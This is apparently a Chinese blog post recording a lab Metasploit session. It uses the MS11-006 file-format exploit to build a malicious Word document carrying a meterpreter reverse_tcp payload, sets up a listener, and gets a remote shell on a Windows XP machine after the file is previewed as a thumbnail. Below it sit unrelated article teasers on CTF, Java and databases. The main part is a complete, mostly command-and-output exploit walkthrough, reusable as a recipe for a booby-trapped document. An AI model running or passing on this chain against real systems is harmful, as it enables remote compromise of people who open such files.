feier7501
feier7501

metasploit文件格式漏洞渗透攻击(成功获得shell)

环境BT5R1

msf > use windows/fileformat/ms11_006_createsizeddibsection
msf  exploit(ms11_006_createsizeddibsection) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(ms11_006_createsizeddibsection) > set LHOST 192.168.1.11
LHOST => 192.168.1.11
msf  exploit(ms11_006_createsizeddibsection) > set LPORT 443
LPORT => 443
msf  exploit(ms11_006_createsizeddibsection) > set OUTPUTPATH /opt/framework/msf3/data/exploits/
OUTPUTPATH => /opt/framework/msf3/data/exploits/
msf  exploit(ms11_006_createsizeddibsection) > show options

Module options (exploit/windows/fileformat/ms11_006_createsizeddibsection):

   Name        Current Setting                     Required  Description
   ----        ---------------                     --------  -----------
   FILENAME    msf.doc                             yes       The file name.
   OUTPUTPATH  /opt/framework/msf3/data/exploits/  yes       The output path to use.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  seh              yes       Exit technique: seh, thread, process, none
   LHOST     192.168.1.11     yes       The listen address
   LPORT     443              yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(ms11_006_createsizeddibsection) > exploit

[*] Creating 'msf.doc' file ...
[*] Generated output file /opt/framework/msf3/data/exploits/msf.doc
msf  exploit(ms11_006_createsizeddibsection) > use multi/handler
msf  exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 192.168.1.11
LHOST => 192.168.1.11
msf  exploit(handler) > set LPORT 443
LPORT => 443
msf  exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.11:443 
[*] Starting the payload handler...
msf  exploit(handler) > sessions -l

Active sessions
===============

No active sessions.

msf  exploit(handler) >

把msf.doc复制到XP里,一开始,双击,BT5没反应。

后来,我用缩略图来查看,不需要双击msf.doc,BT5就有反应了(书中说是要打开该文档,估计有误)。

msf  exploit(handler) > 
[*] Sending stage (752128 bytes) to 192.168.1.143
[*] Meterpreter session 1 opened (192.168.1.11:443 -> 192.168.1.143:1099) at 2013-05-14 19:32:47 -0400

msf  exploit(handler) > sessions -l

Active sessions
===============

  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  1   meterpreter x86/win32  ROOT-4556186478\Administrator @ ROOT-4556186478  192.168.1.11:443 -> 192.168.1.143:1099

msf  exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls

Listing: C:\Documents and Settings\Administrator
================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   0       dir   2013-05-14 10:20:44 -0400  .
40777/rwxrwxrwx   0       dir   2013-05-14 10:20:43 -0400  ..
40555/r-xr-xr-x   0       dir   2013-05-14 10:21:13 -0400  Application Data
40777/rwxrwxrwx   0       dir   2013-05-14 10:14:40 -0400  Cookies
40777/rwxrwxrwx   0       dir   2013-05-14 17:51:30 -0400  Desktop
40555/r-xr-xr-x   0       dir   2013-05-14 10:21:21 -0400  Favorites
40777/rwxrwxrwx   0       dir   2013-05-14 17:51:30 -0400  Local Settings
40555/r-xr-xr-x   0       dir   2013-05-14 10:21:22 -0400  My Documents
100666/rw-rw-rw-  786432  fil   2013-05-14 11:30:17 -0400  NTUSER.DAT
40777/rwxrwxrwx   0       dir   2013-05-14 17:51:30 -0400  NetHood
40777/rwxrwxrwx   0       dir   2013-05-14 17:51:30 -0400  PrintHood
40555/r-xr-xr-x   0       dir   2013-05-14 11:30:35 -0400  Recent
40555/r-xr-xr-x   0       dir   2013-05-14 10:21:02 -0400  SendTo
40555/r-xr-xr-x   0       dir   2013-05-14 17:51:30 -0400  Start Menu
40777/rwxrwxrwx   0       dir   2013-05-14 10:10:10 -0400  Templates
100666/rw-rw-rw-  1024    fil   2013-05-14 11:32:49 -0400  ntuser.dat.LOG
100666/rw-rw-rw-  178     fil   2013-05-14 10:23:33 -0400  ntuser.ini

meterpreter > sysinfo
Computer        : ROOT-4556186478
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > shell
Process 1888 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>

如果换到简体中文版本的XP上面,用缩略图查看,则会失败,无法获得shell。


你可能感兴趣的:(metasploit文件格式漏洞渗透攻击(成功获得shell))

  • 参加【2025年春季】全国CTF夺旗赛-从零基础入门到竞赛,看这一篇就稳了! 白帽子凯哥 web安全学习安全CTF夺旗赛网络安全
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包目录一、CTF简介二、CTF竞赛模式三、CTF各大题型简介四、CTF学习路线4.1、初期1、html+css+js(2-3天)2、apache+php(4-5天)3、mysql(2-3天)4、python(2-3天)5、burpsuite(1-2天)4.2、中期1、SQL注入(7-8天)2、文件上传(7-8天)3、其他漏洞(14-15
  • 参加【2025年春季】全国CTF夺旗赛-从零基础入门到竞赛,看这一篇就稳了! 白帽子凯哥 web安全学习安全CTF夺旗赛网络安全
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包目录一、CTF简介二、CTF竞赛模式三、CTF各大题型简介四、CTF学习路线4.1、初期1、html+css+js(2-3天)2、apache+php(4-5天)3、mysql(2-3天)4、python(2-3天)5、burpsuite(1-2天)4.2、中期1、SQL注入(7-8天)2、文件上传(7-8天)3、其他漏洞(14-15
  • 浅析 SSH 免密登录原理 jax不摆烂 网络网络服务器
    SSH(SecureShell)是一种网络协议,可以在不安全的网络中提供一种安全的加密通信方式。SSH免密登录是指用户在登录远程主机时,无需输入密码即可完成登录,免去每次登录时输入密码的烦恼。这种方式既提高了用户的操作便捷性,又避免了使用简单密码的风险,极大地提高了登录的安全性。本文旨在以简单易懂的方式解释SSH免密登录的原理。SSH免密登录原理非对称加密在了解SSH免密登录原理之前,我们需要先了
  • pygame下载 2401_86461228 pygamepython
    pygame下载先进入pygame官网下载与你python对应的版本,然后解压:https://www.pygame.org/download.shtml然后打开cmd命令输入pipinstallpygame等待执行结束,然后打开python输入代码importpygame再运行,入出现以下情况说明安装成功注:我的python是32位的
  • 【黑龙江乡镇界】面图层arcgis数据shp格式乡镇名称和编码wgs84无偏移内容测评 鸿业远图科技 arcgis
    本文将详细讲解与“最新黑龙江乡镇界面图层arcgis数据shp格式乡镇名称和编码wgs84无偏移”相关的知识点,包括GIS基础、ArcGIS软件、SHP文件格式、WGS84坐标系统以及乡镇行政数据的重要性。GIS基础GIS(GeographicInformationSystem,地理信息系统)是一种用于采集、存储、管理、分析和展示所有类型地理数据的系统。它整合了地图、数据库、统计分析和计算机图形等
  • 微服务中常用注解 陈鹏的博客 分布式微服务java后端
    1.@Component(spring注解)用来标注将普通类交给Spring管理。交给Spring管理就是注册到spring容器中,让spring帮你创建对象。可以通过spring容器获得该对象。相当于springxml配置文件中的bean标签2.@Repository(spring注解)用来标注将mapper层接口的实现类交给Spring管理。@Component的衍生注解,用于标注mapper
  • 国外各领域专家学者的一些谏言:如何使AI代理架构变得成功 强哥之神 人工智能语言模型AI代理智能体大模型Agent
    最近在研究AI代理架构为什么比较难落地,看到有一篇文章是关于各领域专家学者对AI代理架构的一些看法,值得关注。我将其整理成了中文,大家可一起细品各家观点,全文如下。代理型人工智能被寄予厚望,其潜力在于能够独立完成复杂任务。然而,目前该领域的炒作热潮远超实际成功案例,背后原因复杂多样。“2024年,AI代理已成为众多供应商的营销热词。但对于用户组织而言,代理技术还处于早期探索阶段,充满好奇心与实验性
  • 引入正确依赖但还是爆红 笑发财了1 springbootjavamavenspringmybatis
    springboot项目,maven工程。这个问题是我在成功运行这个项目后出现的,再次打开的时候居然又爆红了。尝试了clean和重编译也没用,于是尝试重新加载,就好了
  • MySQL——事务 很楠不爱 MySQLmysql数据库
    一.事务的概念事务就是一组DML语句组成,这些语句在逻辑上存在相关性,这一组DML语句要么全部成功,要么全部失败,是一个整体。MySQL提供一种机制,保证我们达到这样的效果。事务还规定不同的客户端看到的数据是不相同的。一个完整的事务,绝对不是简单的sql集合,还需要满足如下四个属性:原子性:一个事务(transaction)中的所有操作,要么全部完成,要么全部不完成,不会结束在中间某个环节。事务在
  • 系统安全架构之车辆网络安全架构 小正太浩二 安全架构web安全架构
    一、简介随着汽车的智能化和互联化,车辆网络安全架构的重要性日益凸显。现代汽车越来越依赖于计算机和网络技术,车载电子设备数量增加,不同设备之间的互联性增强,这使得车辆网络系统容易受到网络攻击。对于汽车而言,安全问题已经不再只是关乎车辆本身的问题,而是涉及到了乘客的安全和隐私,甚至是道路安全和整个社会的安全。因此,确保车辆网络的安全性和可靠性已成为了汽车安全的重要组成部分。二、车辆网络安全的威胁和挑战
  • 在 Windows 系统上,将 Ubuntu 从 C 盘 迁移到 D 盘 YiHanXii windowsubuntupostgresql
    在Windows系统上,如果你使用的是WSL(WindowsSubsystemforLinux)并安装了Ubuntu,你可以将Ubuntu从C盘迁移到D盘。迁移过程涉及导出当前的Ubuntu发行版,然后将其导入到D盘的目标目录。以下是详细的步骤:1.导出Ubuntu发行版首先,你需要将Ubuntu发行版从当前的C盘导出为.tar文件。打开PowerShell(管理员权限):按Win+X,选择Win
  • The Sandbox 2024 年度回顾和未来发展计划 BeepCrypto 区块链web3游戏
    突破性的主流合作伙伴关系、平台创新和深入的社交玩家参与,这是TheSandbox变革的一年。“TheSandbox设想了一个去中心化的元宇宙。在这个宇宙中,用户和品牌可以通过NFT创造和拥有体验,并通过体验来获得盈利,促进有创意的、协作的以及繁荣的「边玩边赚」经济。”自2018年启动以来,这一愿景一直指引着我们,去年,我们继续朝着实现这一愿景迈出有意义的步伐。今年,我们继续为社区服务,在TheSa
  • ARM 处理器架构简介 ASMARM ARMARM处理器架构
    ARM架构是构建每个ARM处理器的基础。ARM架构随着时间的推移不断发展,其中包含的架构功能可满足不断增长的新功能、高性能需求以及新兴市场的需要。有关最新公布版本的信息,请参阅ARMv8架构。ARM架构支持跨跃多个性能点的实现,并已在许多细分市场中成为主导的架构。ARM架构支持非常广泛的性能点,因而可以利用最新的微架构技术获得极小的ARM处理器实现和极有效的高级设计实现。实现规模、性能和低功耗是A
  • [RHEL7基础篇-4] 用户和权限 JoveZou #RHEL7基础篇RedHatEnterpriseLinuxlinuxrhel
    [RHEL7基础篇-4]用户和权限简介用户和权限用户和组权限简介在RHEL7当中控制用户权限有DAC和ACL两种方式来控制文件或目录对于相应用户或组的权限,有的时候管理员为了系统安全往往会把root用户给藏起来,不给ssh远程登录,那时我们将使用到sudo来临时获得root用户的权限,或者通过su来切换到拥有权限的用户进行操作,该篇将会讲述用户和权限的相关配置与使用,以及如何临时获得root权限与
  • 什么是CSP?全面了解内容安全策略(Content Security Policy) 山禾女鬼001 网络协议网络安全
    CSP(ContentSecurityPolicy)是一种网络安全机制,旨在减少或消除跨站脚本(XSS)和数据注入攻击。它通过提供一种允许网站管理员控制哪些资源可以在网页中加载、执行,从而有效提升网站的安全性。CSP的基本概念CSP的核心思想是,通过限制网页可以加载的外部资源,防止恶意脚本通过第三方资源注入到网站中。具体来说,CSP通过一个名为Content-Security-Policy的HTT
  • 【Mac】Python相关知识经验 水银嘻嘻 Pythonmacospython开发语言
    一、给Python3安装第三方库mac下给Python3安装第三方库pillow,处理图片【安装方式】:终端中输入命令:python3-mpipinstallpillow按回车,等待pillow下载安装NOTE:其他模块同理,如pytesseract二、Python版本升级1.终端执行命令:brewinstallpython32.安装Python3版本成功后,系统默认的仍旧是之前的版本,注意不要去
  • 【并发多个请求并失败重发】 CaraYQ 实践javascript开发语言ecmascript
    文章目录需求思路代码需求可以一次发任意多个请求,如果有失败,则重发失败的请求,知道所有的都成功,或者超出最大重试次数,才返回最终结果。封装成可复用的并发请求工具。实际的应用场景:数据太大,分批次传给后端,比如大文件分片上传思路使用循环、promise.all、promise.allSettled都可以用来发请求:循环能做到并发,各发各的,各回各的,如果要使用循环,需要自己写一个监听者监听请求都完成
  • 企业架构蓝图:驱动数字化转型的战略指南与实施路径 AZone架构院 微服务大数据架构人工智能数字化转型云原生
    当今高速发展的商业环境中,企业数字化转型已经成为一个不可忽视的主题。然而,如何成功实现这种转型对于许多企业而言仍然充满挑战。本文将以企业如何利用和实施企业架构蓝图(EABlueprint)为核心,提供具体的路径和指导,帮助企业顺利完成数字化转型。企业架构蓝图作为企业数字化转型的核心工具,能够为企业从战略设计到执行落地提供全面的支持。本文将深入解读企业架构蓝图的理论基础、如何构建、实施步骤以及实际应
  • 架构蓝图的力量:引领企业数字化转型的最佳路径 AZone架构院 数字化转型微服务架构运维大数据
    企业数字化转型中的架构蓝图企业数字化转型不仅是一个技术升级的过程,更是企业从战略、技术到业务模式的全方位变革。在这个过程中,构建清晰的架构蓝图至关重要。架构蓝图不仅能确保技术与业务战略的一致性,还能够帮助企业在转型过程中管理复杂性,保障合规性,最终实现数字化转型的成功。本文将从企业如何利用和实施架构蓝图的角度出发,深入解析其在数字化转型中的关键作用,并提供实际操作的指导原则和最佳实践,帮助企业有效
  • 架构蓝图:驱动企业数字化转型的关键路径 The Open Group 数字化转型大数据分布式人工智能微服务
    在全球范围内,数字化转型已经成为企业获取竞争优势、提升运营效率的战略核心。无论是传统企业还是新兴行业,都必须通过深入的技术应用来重新定义业务模式和客户价值。然而,成功的数字化转型并非仅仅依赖于新技术的引入,更取决于企业能否构建并实施有效的架构蓝图(ArchitectureBlueprint)。这种蓝图为企业提供了从战略到执行的全景视图,确保技术和业务目标的有机结合。本篇文章将从企业如何利用架构蓝图
  • WARNING: overwriting environment variables set in the machine overwriting variable [‘PATH‘] cuber膜拜 pythonvirtualenv
    问题conda在激活环境时出现如下警告:WARNING:overwritingenvironmentvariablessetinthemachineoverwritingvariable['PATH']解决激活当前环境:condaactivatemyenv取消设置环境变量:condaenvconfigvarsunsetPATH重写激活环境查看是否修改成功:condadeactivatecondaa
  • 端口扫描、拒绝服务和缓冲区溢出 梦龙zmc 网络安全安全
    端口扫描1、扫描三步曲一个完整的网络安全扫描分为三个阶段:第一阶段:发现目标主机或网络(端口扫描)第二阶段:发现目标后进一步搜集目标信息,包括操作系统类型、运行的服务以及服务软件的版本等。如果目标是一个网络,还可以进一步发现该网络的拓扑结构、路由设备以及各主机的信息(目标信息识别)第三阶段:根据收集到的信息判断或者进一步测试系统是否存在安全漏洞(漏洞扫描)2、端口扫描技术当确定了目标主机活跃后,就
  • 第二十二:Python接口自动化-token登录 平头哥-测试 python自动化
    一.简介1.为验证用户登录情况以及减轻服务器的压力,减少频繁的查询数据库,使服务器更加健壮2.有些登录不是用cookie来验证的,是用token参数来判断是否登录3.token传参有两种3.1.一种是放在请求头里,本质跟cookie是一样3.2.一种是在url请求参数里,这种更直观二.抓包登录返回token1.登录接口,就是没有cookies的登录接口。但是登录接口,登录成功后有返回tok
  • 如何控制主从架构的数据一致性? 架构随笔录 分布式存储大数据架构数据库java后端中间件
    胡弦,视频号2023年度优秀创作者,互联网大厂P8技术专家,SpringCloudAlibaba微服务架构实战派(上下册)和RocketMQ消息中间件实战派(上下册)的作者,资深架构师,技术负责人,极客时间训练营讲师,四维口袋KVP最具价值技术专家,技术领域专家团成员,2021电子工业出版社年度优秀作者,获得2023电子工业出版技术成长领路人称号,荣获2024年电子工业出版社博文视点20周年荣誉专
  • 202年寒假充电计划——自学手册 网络安全(黑客技术) 网安康sir web安全安全网络php开发语言
    前言什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。如何成为一名黑客很多朋友在学习安全方面都会半路转行,因为不知如何去学,在这里,我将这个整份答案分为黑客(网络安全)入门必备、黑客(网络安全)职业指南、黑客(网络安全)学习导航三大章节,涉及价值观、方法论、执行力、行业分类、职位解读、法
  • 如何高效调用API:使用Python构建可靠的网络请求 qq_37836323 python开发语言
    #引言在当今的开发环境中,API的使用变得无处不在。无论是获取数据还是操作远程服务,API都是一个必不可少的工具。然而,由于网络限制和访问不稳定等问题,在某些地区开发者可能需要考虑使用API代理服务来提高API的访问成功率。本文将带您了解如何使用Python高效调用API,并提供实用的代码示例。#主要内容##API调用的基础API(应用程序编程接口)允许不同的软件程序通过API端点进行通信。对于P
  • double保留两位小数的四种方法 小小野猪 Java基础javadouble
    这里写目录标题引言方法一:使用`BigDecimal`类方法二:使用`DecimalFormat`类方法三:使用`NumberFormat`类方法四:使用`String.format`方法结论声明引言在Java编程中,我们经常遇到需要对double类型的浮点数进行精确截断或四舍五入保留两位小数的需求。由于double类型在进行浮点运算时存在精度问题,因此,为了获得期望的精确表示,我们可以采用一些专
  • 25-5 SQL 注入攻击 - insert注入 技术探索 Web安全攻防全解析sql数据库
    环境准备:构建完善的安全渗透测试环境:推荐工具、资源和下载链接_渗透测试靶机下载-CSDN博客一、注入原理描述:insert注入是指通过前端注册的信息被后台通过insert操作插入到数据库中。如果后台没有做相应的处理,就可能导致insert注入漏洞。原因:后台未对用户输入进行充分验证和过滤,导致恶意用户可以利用特定的输入构造恶意代码,从而影响数据库的插入操作,或者获取敏感数据。二、注入方法注入手段
  • 解锁编程智慧:23种设计模式案例分享 码农技术栈 设计模式
    为什么要学习设计模式?你可以把设计模式想象成一些做饭的菜谱。当我们需要做一道菜(开发一个功能)时,如果按照自己的想法随意添加调料(编写代码),很可能做出的菜味道不好(功能不稳定或有bug)。但是,如果我们按照一个成功的菜谱(设计模式)来做,就能更容易地做出美味的菜肴(开发出稳定的功能)。设计模式就是一些在软件开发中经常被使用的“菜谱”,它们可以帮助我们更好地组织代码、提高代码的可读性和可维护性。这
  • 【Docker】 privileged: true:允许容器获得比默认更高的权限 roman_日积跬步-终至千里 Dockerdocker容器运维
    文章目录一.启用`privileged`模式二.`privileged:true`的作用三.安全隐患与处理privileged:true是Docker中一个特殊的配置,允许容器获得比默认更高的权限。虽然它可以解决一些特定问题,但也带来了安全风险。一.启用privileged模式DockerCompose示例:version:"3.8"services:myservice:image:myimage
  • java工厂模式 3213213333332132 java抽象工厂
    工厂模式有 1、工厂方法 2、抽象工厂方法。 下面我的实现是抽象工厂方法, 给所有具体的产品类定一个通用的接口。 package 工厂模式; /** * 航天飞行接口 * * @Description * @author FuJianyong * 2015-7-14下午02:42:05 */ public interface SpaceF
  • nginx频率限制+python测试 ronin47 nginx 频率 python
           部分内容参考:http://www.abc3210.com/2013/web_04/82.shtml 首先说一下遇到这个问题是因为网站被攻击,阿里云报警,想到要限制一下访问频率,而不是限制ip(限制ip的方案稍后给出)。nginx连接资源被吃空返回状态码是502,添加本方案限制后返回599,与正常状态码区别开。步骤如下:
  • java线程和线程池的使用 dyy_gusi ThreadPoolthreadRunnabletimer
    java线程和线程池 一、创建多线程的方式     java多线程很常见,如何使用多线程,如何创建线程,java中有两种方式,第一种是让自己的类实现Runnable接口,第二种是让自己的类继承Thread类。其实Thread类自己也是实现了Runnable接口。具体使用实例如下: 1、通过实现Runnable接口方式 1 2
  • Linux 171815164 linux
    ubuntu kernel http://kernel.ubuntu.com/~kernel-ppa/mainline/v4.1.2-unstable/ 安卓sdk代理 mirrors.neusoft.edu.cn        80 输入法和jdk sudo apt-get install fcitx su
  • Tomcat JDBC Connection Pool g21121 Connection
           Tomcat7 抛弃了以往的DBCP 采用了新的Tomcat Jdbc Pool 作为数据库连接组件,事实上DBCP已经被Hibernate 所抛弃,因为他存在很多问题,诸如:更新缓慢,bug较多,编译问题,代码复杂等等。        Tomcat Jdbc P
  • 敲代码的一点想法 永夜-极光 java随笔感想
                  入门学习java编程已经半年了,一路敲代码下来,现在也才1w+行代码量,也就菜鸟水准吧,但是在整个学习过程中,我一直在想,为什么很多培训老师,网上的文章都是要我们背一些代码?比如学习Arraylist的时候,教师就让我们先参考源代码写一遍,然
  • jvm指令集 程序员是怎么炼成的 jvm 指令集
    转自:http://blog.csdn.net/hudashi/article/details/7062675#comments       将值推送至栈顶时 const ldc  push   load指令 const系列 该系列命令主要负责把简单的数值类型送到栈顶。(从常量池或者局部变量push到栈顶时均使用) 0x02 &nbs
  • Oracle字符集的查看查询和Oracle字符集的设置修改 aijuans oracle
    本文主要讨论以下几个部分:如何查看查询oracle字符集、 修改设置字符集以及常见的oracle utf8字符集和oracle exp 字符集问题。 一、什么是Oracle字符集 Oracle字符集是一个字节数据的解释的符号集合,有大小之分,有相互的包容关系。ORACLE 支持国家语言的体系结构允许你使用本地化语言来存储,处理,检索数据。它使数据库工具,错误消息,排序次序,日期,时间,货
  • png在Ie6下透明度处理方法 antonyup_2006 css浏览器FirebugIE
    由于之前到深圳现场支撑上线,当时为了解决个控件下载,我机器上的IE8老报个错,不得以把ie8卸载掉,换个Ie6,问题解决了,今天出差回来,用ie6登入另一个正在开发的系统,遇到了Png图片的问题,当然升级到ie8(ie8自带的开发人员工具调试前端页面JS之类的还是比较方便的,和FireBug一样,呵呵),这个问题就解决了,但稍微做了下这个问题的处理。 我们知道PNG是图像文件存储格式,查询资
  • 表查询常用命令高级查询方法(二) 百合不是茶 oracle分页查询分组查询联合查询
    ----------------------------------------------------分组查询 group by    having   --平均工资和最高工资   select avg(sal)平均工资,max(sal)  from emp ;  --每个部门的平均工资和最高工资
  • uploadify3.1版本参数使用详解 bijian1013 JavaScriptuploadify3.1
    使用:     绑定的界面元素<input id='gallery'type='file'/>$("#gallery").uploadify({设置参数,参数如下}); 设置的属性: id: jQuery(this).attr('id'),//绑定的input的ID langFile: 'http://ww
  • 精通Oracle10编程SQL(17)使用ORACLE系统包 bijian1013 oracle数据库plsql
    /* *使用ORACLE系统包 */ --1.DBMS_OUTPUT --ENABLE:用于激活过程PUT,PUT_LINE,NEW_LINE,GET_LINE和GET_LINES的调用 --语法:DBMS_OUTPUT.enable(buffer_size in integer default 20000); --DISABLE:用于禁止对过程PUT,PUT_LINE,NEW
  • 【JVM一】JVM垃圾回收日志 bit1129 垃圾回收
    将JVM垃圾回收的日志记录下来,对于分析垃圾回收的运行状态,进而调整内存分配(年轻代,老年代,永久代的内存分配)等是很有意义的。JVM与垃圾回收日志相关的参数包括: -XX:+PrintGC -XX:+PrintGCDetails -XX:+PrintGCTimeStamps -XX:+PrintGCDateStamps -Xloggc -XX:+PrintGC 通
  • Toast使用 白糖_ toast
    Android中的Toast是一种简易的消息提示框,toast提示框不能被用户点击,toast会根据用户设置的显示时间后自动消失。     创建Toast 两个方法创建Toast makeText(Context context, int resId, int duration)     参数:context是toast显示在
  • angular.identity boyitech AngularJSAngularJS API
    angular.identiy 描述: 返回它第一参数的函数. 此函数多用于函数是编程. 使用方法: angular.identity(value); 参数详解: Param Type Details value * to be returned. 返回值: 传入的value 实例代码: <!DOCTYPE HTML>
  • java-两整数相除,求循环节 bylijinnan java
    import java.util.ArrayList; import java.util.List; public class CircleDigitsInDivision { /** * 题目:求循环节,若整除则返回NULL,否则返回char*指向循环节。先写思路。函数原型:char*get_circle_digits(unsigned k,unsigned j)
  • Java 日期 周 年 Chen.H javaC++cC#
    /** * java日期操作(月末、周末等的日期操作) * * @author * */ public class DateUtil { /** */ /** * 取得某天相加(减)後的那一天 * * @param date * @param num *
  • [高考与专业]欢迎广大高中毕业生加入自动控制与计算机应用专业 comsci 计算机
          不知道现在的高校还设置这个宽口径专业没有,自动控制与计算机应用专业,我就是这个专业毕业的,这个专业的课程非常多,既要学习自动控制方面的课程,也要学习计算机专业的课程,对数学也要求比较高.....如果有这个专业,欢迎大家报考...毕业出来之后,就业的途径非常广.....      以后
  • 分层查询(Hierarchical Queries) daizj oracle递归查询层次查询
    Hierarchical Queries If a table contains hierarchical data, then you can select rows in a hierarchical order using the hierarchical query clause: hierarchical_query_clause::= start with condi
  • 数据迁移 daysinsun 数据迁移
    最近公司在重构一个医疗系统,原来的系统是两个.Net系统,现需要重构到java中。数据库分别为SQL Server和Mysql,现需要将数据库统一为Hana数据库,发现了几个问题,但最后通过努力都解决了。 1、原本通过Hana的数据迁移工具把数据是可以迁移过去的,在MySQl里面的字段为TEXT类型的到Hana里面就存储不了了,最后不得不更改为clob。 2、在数据插入的时候有些字段特别长
  • C语言学习二进制的表示示例 dcj3sjt126com cbasic
    进制的表示示例 # include <stdio.h> int main(void) { int i = 0x32C; printf("i = %d\n", i); /* printf的用法 %d表示以十进制输出 %x或%X表示以十六进制的输出 %o表示以八进制输出 */ return 0; }
  • NsTimer 和 UITableViewCell 之间的控制 dcj3sjt126com ios
    情况是这样的: 一个UITableView, 每个Cell的内容是我自定义的 viewA viewA上面有很多的动画, 我需要添加NSTimer来做动画, 由于TableView的复用机制, 我添加的动画会不断开启, 没有停止, 动画会执行越来越多.   解决办法: 在配置cell的时候开始动画, 然后在cell结束显示的时候停止动画   查找cell结束显示的代理
  • MySql中case when then 的使用 fanxiaolong casewhenthenend
    select "主键", "项目编号", "项目名称","项目创建时间", "项目状态","部门名称","创建人" union (select pp.id as "主键", pp.project_number as &
  • Ehcache(01)——简介、基本操作 234390216 cacheehcache简介CacheManagercrud
    Ehcache简介 目录 1       CacheManager 1.1      构造方法构建 1.2      静态方法构建 2       Cache 2.1&
  • 最容易懂的javascript闭包学习入门 jackyrong JavaScript
    http://www.ruanyifeng.com/blog/2009/08/learning_javascript_closures.html 闭包(closure)是Javascript语言的一个难点,也是它的特色,很多高级应用都要依靠闭包实现。 下面就是我的学习笔记,对于Javascript初学者应该是很有用的。 一、变量的作用域 要理解闭包,首先必须理解Javascript特殊
  • 提升网站转化率的四步优化方案 php教程分享 数据结构PHP数据挖掘Google活动
    网站开发完成后,我们在进行网站优化最关键的问题就是如何提高整体的转化率,这也是营销策略里最最重要的方面之一,并且也是网站综合运营实例的结果。文中分享了四大优化策略:调查、研究、优化、评估,这四大策略可以很好地帮助用户设计出高效的优化方案。 PHP开发的网站优化一个网站最关键和棘手的是,如何提高整体的转化率,这是任何营销策略里最重要的方面之一,而提升网站转化率是网站综合运营实力的结果。今天,我就分
  • web开发里什么是HTML5的WebSocket? naruto1990 Webhtml5浏览器socket
    当前火起来的HTML5语言里面,很多学者们都还没有完全了解这语言的效果情况,我最喜欢的Web开发技术就是正迅速变得流行的 WebSocket API。WebSocket 提供了一个受欢迎的技术,以替代我们过去几年一直在用的Ajax技术。这个新的API提供了一个方法,从客户端使用简单的语法有效地推动消息到服务器。让我们看一看6个HTML5教程介绍里 的 WebSocket API:它可用于客户端、服
  • Socket初步编程——简单实现群聊 Everyday都不同 socket网络编程初步认识
    初次接触到socket网络编程,也参考了网络上众前辈的文章。尝试自己也写了一下,记录下过程吧:   服务端:(接收客户端消息并把它们打印出来)   public class SocketServer { private List<Socket> socketList = new ArrayList<Socket>(); public s
  • 面试:Hashtable与HashMap的区别(结合线程) toknowme
    昨天去了某钱公司面试,面试过程中被问道 Hashtable与HashMap的区别?当时就是回答了一点,Hashtable是线程安全的,HashMap是线程不安全的,说白了,就是Hashtable是的同步的,HashMap不是同步的,需要额外的处理一下。   今天就动手写了一个例子,直接看代码吧 package com.learn.lesson001; import java
  • MVC设计模式的总结 xp9802 设计模式mvc框架IOC
    随着Web应用的商业逻辑包含逐渐复杂的公式分析计算、决策支持等,使客户机越 来越不堪重负,因此将系统的商业分离出来。单独形成一部分,这样三层结构产生了。 其中‘层’是逻辑上的划分。 三层体系结构是将整个系统划分为如图2.1所示的结构[3] (1)表现层(Presentation layer):包含表示代码、用户交互GUI、数据验证。 该层用于向客户端用户提供GUI交互,它允许用户
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他